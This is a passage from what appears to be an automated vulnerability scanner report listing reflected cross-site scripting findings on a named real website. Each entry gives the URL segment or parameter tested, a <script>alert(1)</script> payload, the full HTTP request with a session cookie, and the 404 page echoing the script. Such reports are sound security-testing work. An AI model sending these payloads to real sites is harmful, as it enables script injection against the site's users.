Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images7f87c<script>alert(1)</script>0181e746451/folder.gif was not found on this server.</p>
...[SNIP]...

2.339. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 80aeb<script>alert(1)</script>6f3e10c19c3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/folder.gif80aeb<script>alert(1)</script>6f3e10c19c3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/folder.gif80aeb<script>alert(1)</script>6f3e10c19c3 was not found on this server.</p>
...[SNIP]...

2.340. http://www.resellerbase.com/adult/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d639<script>alert(1)</script>d8ae41438e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/folder.gif?2d639<script>alert(1)</script>d8ae41438e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/folder.gif?2d639<script>alert(1)</script>d8ae41438e=1 was not found on this server.</p>
...[SNIP]...

2.341. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70185<script>alert(1)</script>d0cf90331d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult70185<script>alert(1)</script>d0cf90331d9/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult70185<script>alert(1)</script>d0cf90331d9/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.342. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 16049<script>alert(1)</script>c7996499558 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes16049<script>alert(1)</script>c7996499558/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.343. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9231a<script>alert(1)</script>821d3a7aed5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos9231a<script>alert(1)</script>821d3a7aed5/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos9231a<script>alert(1)</script>821d3a7aed5/images/rating/ was not found on this server.</p>
...[SNIP]...

2.344. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb92c<script>alert(1)</script>d5912c97b26 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/imagescb92c<script>alert(1)</script>d5912c97b26/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/imagescb92c<script>alert(1)</script>d5912c97b26/rating/ was not found on this server.</p>
...[SNIP]...

2.345. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a0b1b<script>alert(1)</script>52eb495b56d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/ratinga0b1b<script>alert(1)</script>52eb495b56d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/ratinga0b1b<script>alert(1)</script>52eb495b56d/ was not found on this server.</p>
...[SNIP]...

2.346. http://www.resellerbase.com/adult/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 46313<script>alert(1)</script>bfd0a12799a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/?46313<script>alert(1)</script>bfd0a12799a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/?46313<script>alert(1)</script>bfd0a12799a=1 was not found on this server.</p>
...[SNIP]...

2.347. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9238c<script>alert(1)</script>e36e8f0c451 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult9238c<script>alert(1)</script>e36e8f0c451/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult9238c<script>alert(1)</script>e36e8f0c451/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.348. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a56ec<script>alert(1)</script>7fff6e52b96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesa56ec<script>alert(1)</script>7fff6e52b96/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesa56ec<script>alert(1)</script>7fff6e52b96/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.349. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 918b7<script>alert(1)</script>37a655a4536 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos918b7<script>alert(1)</script>37a655a4536/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos918b7<script>alert(1)</script>37a655a4536/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.350. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe85f<script>alert(1)</script>ae2db4ac63e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/imagesfe85f<script>alert(1)</script>ae2db4ac63e/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/imagesfe85f<script>alert(1)</script>ae2db4ac63e/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.351. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 20f3c<script>alert(1)</script>909308d1ea2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating20f3c<script>alert(1)</script>909308d1ea2/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating20f3c<script>alert(1)</script>909308d1ea2/0.gif was not found on this server.</p>
...[SNIP]...

2.352. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f4f8c<script>alert(1)</script>631e1cdb0e2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/0.giff4f8c<script>alert(1)</script>631e1cdb0e2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/0.giff4f8c<script>alert(1)</script>631e1cdb0e2 was not found on this server.</p>
...[SNIP]...

2.353. http://www.resellerbase.com/adult/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 22b9f<script>alert(1)</script>086a5136221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/rating/0.gif?22b9f<script>alert(1)</script>086a5136221=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/rating/0.gif?22b9f<script>alert(1)</script>086a5136221=1 was not found on this server.</p>
...[SNIP]...

2.354. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42705<script>alert(1)</script>ae8b0c52334 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult42705<script>alert(1)</script>ae8b0c52334/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult42705<script>alert(1)</script>ae8b0c52334/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.355. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a722<script>alert(1)</script>695381f05f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes1a722<script>alert(1)</script>695381f05f4/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes1a722<script>alert(1)</script>695381f05f4/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.356. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ebdf8<script>alert(1)</script>a614fa267f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosebdf8<script>alert(1)</script>a614fa267f0/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosebdf8<script>alert(1)</script>a614fa267f0/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.357. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ca8c<script>alert(1)</script>a0d261f18a0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images4ca8c<script>alert(1)</script>a0d261f18a0/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images4ca8c<script>alert(1)</script>a0d261f18a0/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.358. http://www.resellerbase.com/adult/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d6c3e<script>alert(1)</script>6e698512bf1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/ratingd6c3e<script>alert(1)</script>6e698512bf1/3half.gif HTTP/1.1
